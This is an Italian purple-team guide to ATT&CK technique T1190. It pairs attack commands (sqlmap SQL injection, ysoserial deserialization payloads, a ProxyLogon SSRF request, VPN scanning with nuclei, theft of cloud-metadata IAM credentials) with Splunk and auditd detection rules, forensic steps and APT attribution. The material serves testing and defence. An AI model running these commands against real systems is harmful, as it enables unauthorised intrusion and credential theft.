Exploit Public-Facing: Exploit Public-Facing Application (T1190)

Per replicare efficacemente questi attacchi in ambiente controllato, inizia con l'identificazione delle vulnerabilità utilizzando sqlmap per automatizzare l'exploit di SQL injection: sqlmap -u "http://target.com/page.php?id=1" --batch --risk=3 --level=5. Questo comando esegue test approfonditi contro il parametro specificato.

Quando testi vulnerabilità di deserializzazione Java, genera payload serializzati con ysoserial:

java -jar ysoserial.jar CommonsCollections1 'cmd /c calc.exe' > payload.bin
curl -X POST http://target:8080/api/upload -H "Content-Type: application/octet-stream" --data-binary @payload.bin

Per simulare l'exploit di ProxyLogon contro Exchange, utilizza questa sequenza che sfrutta la SSRF per ottenere il LegacyDN:

curl -k -X POST https://exchange.target.com/owa/auth.owa -d 'destination=https://exchange.target.com/autodiscover/autodiscover.xml&flags=0&username=test'

Successivamente puoi utilizzare il token ottenuto per eseguire comandi PowerShell attraverso l'ECP.

Quando simuli attacchi contro appliance VPN, concentrati su endpoint noti come /dana-na/auth/url_default/welcome.cgi per Pulse Secure o /remote/login per Fortinet. Il tool nuclei può automatizzare questi test: nuclei -u https://vpn.target.com -t cves/ -severity critical,high -o results.txt.

Per ambienti containerizzati, testa l'accesso al metadata service dopo aver ottenuto l'esecuzione iniziale:

curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/

Questo permette di verificare se è possibile escalare i privilegi attraverso le credenziali del ruolo IAM associato.

La detection efficace richiede correlazione multi-segnale piuttosto che alert isolati. Configura il monitoraggio per identificare la catena: richiesta anomala → errore applicativo → spawn di processo → egress verso l'esterno.

Per IIS/ASP.NET, monitora i log con questa query Splunk che identifica pattern di exploit seguiti da esecuzione:

index=web sourcetype=iis cs_uri_query="*union+select*" OR "*cmd.exe*" OR "*powershell*" 
| join host type=inner [search index=windows EventCode=4688 (Image="*w3wp.exe*" AND CommandLine="*cmd.exe*")]
| stats count by src_ip, cs_uri_stem

Implementa detection basata su anomalie statistiche per identificare spike di errori HTTP. Un burst di status code 5xx da un singolo IP in finestre temporali ridotte spesso precede lo sfruttamento riuscito. Configura soglie dinamiche basate sulla baseline del traffico normale: se normalmente hai 2-3 errori 500 per IP ogni ora, un alert su 10+ errori in 5 minuti cattura tentativi di exploit senza generare troppo rumore.

Per Linux, monitora syscall execve da processi web con auditd:

-a always,exit -F arch=b64 -S execve -F uid=www-data -k web_shell

Questo cattura quando Apache o nginx spawna shell, comportamento altamente anomalo in produzione.

Correla i log del Web Application Firewall con eventi di processo e network. Un blocco WAF seguito da connessione outbound dallo stesso host entro 15 minuti indica bypass riuscito. Usa MITRE ATT&CK come framework per mappare gli alert: T1190 spesso precede T1055 (Process Injection) o T1105 (Ingress Tool Transfer).

Riduci i falsi positivi mantenendo whitelist di processi figli legittimi per ogni applicazione. Ad esempio, IIS può legitimamente spawnare csc.exe per compilazione ASP.NET, ma cmd.exe o powershell.exe sono sempre sospetti.

La ricostruzione forense di exploit su applicazioni pubbliche richiede correlazione tra log web, eventi di sistema e artefatti di rete. Inizia sempre dall'identificazione del punto di ingresso nei log del web server.

Su Windows, esamina *C:\inetpub\logs\LogFiles\W3SVC1* cercando URI con pattern di exploit. I timestamp di questi log sono critici per ancorare la timeline. Cerca richieste con caratteri encoded, parametri SQL injection o path traversal che precedono cambiamenti nel comportamento del server.

Identifica la prima esecuzione post-exploit esaminando il registro *HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters*. Le modifiche qui indicano quando l'attaccante ha alterato la configurazione IIS. Correla con EventID 4688 nel Security log per identificare processi spawned da w3wp.exe.

Per sistemi Linux, /var/log/apache2/access.log contiene le richieste iniziali. Cerca pattern come:

"GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200
"POST /upload.php HTTP/1.1" 200 [seguito da dimensione anomala della risposta]

La presenza di webshell richiede analisi di /var/www/html/ con focus su file PHP/JSP creati dopo l'exploit. Il comando find /var/www -type f -newermt "2024-01-15" -name "*.php" -exec grep -l "eval\|system\|exec" {} \; identifica potenziali backdoor.

Esamina auth.log per identificare quando l'attaccante ha creato persistence attraverso account locali. La sequenza tipica mostra: exploit web → webshell → creazione utente → SSH login. I tempi tra questi eventi aiutano a determinare se l'attacco era automatizzato o manuale.

Per ricostruire movimenti laterali post-exploit, analizza ~/.bash_history degli account compromessi e /var/log/wtmp per login anomali. La presenza di tool come curl o wget in history indica download di strumenti aggiuntivi.

L'analisi dei gruppi che sfruttano applicazioni pubbliche rivela pattern distintivi utili per l'attribuzione. APT28 combina exploit di Exchange (CVE-2020-0688) con SQL injection, indicando capacità offensive diversificate e team specializzati per diversi vettori d'attacco.

APT29 mostra preferenza per vulnerabilità in soluzioni VPN e gateway, avendo sfruttato CVE-2019-19781 (Citrix), CVE-2019-11510 (Pulse Secure) e CVE-2019-9670 (Zimbra). Questo pattern suggerisce focus su infrastrutture che forniscono accesso persistente e affidabile, coerente con operazioni di spionaggio a lungo termine.

I gruppi cinesi come APT41 e Threat Group-3390 dimostrano rapidità nell'weaponizzare vulnerabilità zero-day. APT41 ha sfruttato ProxyLogon (CVE-2021-26855) entro giorni dalla disclosure, mentre TG-3390 ha utilizzato le vulnerabilità Exchange nell'operazione HAFNIUM. Questa velocità indica accesso a risorse significative per reverse engineering e sviluppo exploit.

Sandworm Team preferisce targeting di infrastrutture Linux/Unix, come dimostrato dallo sfruttamento di EXIM mail transfer agent. Questo focus su sistemi *nix si allinea con il loro targeting di infrastrutture critiche e sistemi SCADA che spesso girano su piattaforme Linux embedded.

L'overlap negli strumenti tra gruppi suggerisce possibili condivisioni o furto di exploit. Sia FIN7 che Magic Hound hanno utilizzato CVE-2021-31207 contro Exchange, ma con TTP post-exploit differenti - FIN7 per monetizzazione, Magic Hound per spionaggio. Monitorare questi pattern di "exploit sharing" aiuta a prevedere quali gruppi adotteranno nuove vulnerabilità.

I trend geografici mostrano che gruppi iraniani come Fox Kitten e Magic Hound prediligono VPN appliance per mantenere accesso a lungo termine, mentre gruppi ransomware come Cinnamon Tempest cercano vulnerabilità che permettono movimento laterale rapido come Log4j.

Framework MITRE ATT&CK T1190. Campagne documentate includono SolarWinds Compromise (C0024), Operation Wocao (C0014) e ArcaneDoor (C0046). Riferimenti detection da Elastic Security, Splunk Security Content, e Sigma rules repository per correlation multi-segnale di exploit attempts.